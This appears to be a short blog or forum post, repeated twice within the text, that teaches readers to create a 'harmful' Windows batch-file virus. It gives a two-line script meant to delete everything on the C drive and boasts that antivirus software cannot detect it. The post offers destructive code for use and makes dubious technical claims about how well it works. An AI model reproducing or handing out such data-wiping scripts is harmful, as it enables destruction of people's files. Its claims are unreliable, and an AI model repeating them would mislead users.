Guys, here I'm gonna teach you how to create a simple virus yet very powerfull and harmfull, no softwares are required. Only a notepad is enough.
How To Make it & What it will do?
1. Open a notepad and write the below code
@Echo off
Del C:\ *.* |y
2. Save the file as virus.bat(name anything you like but the extension should be .bat)
3. Run the file
This virus will delete the C drive completely, the interesting part is that, it cant be detected by the antiviruses :)
PS : Do not try this in your computer, it will delete all the contents in your C Drive. I will not be responsible for any damage done to your computer.
How To Make it & What it will do?
1. Open a notepad and write the below code
@Echo off
Del C:\ *.* |y
2. Save the file as virus.bat(name anything you like but the extension should be .bat)
3. Run the file
This virus will delete the C drive completely, the interesting part is that, it cant be detected by the antiviruses :)
PS : Do not try this in your computer, it will delete all the contents in your C Drive. I will not be responsible for any damage done to your computer.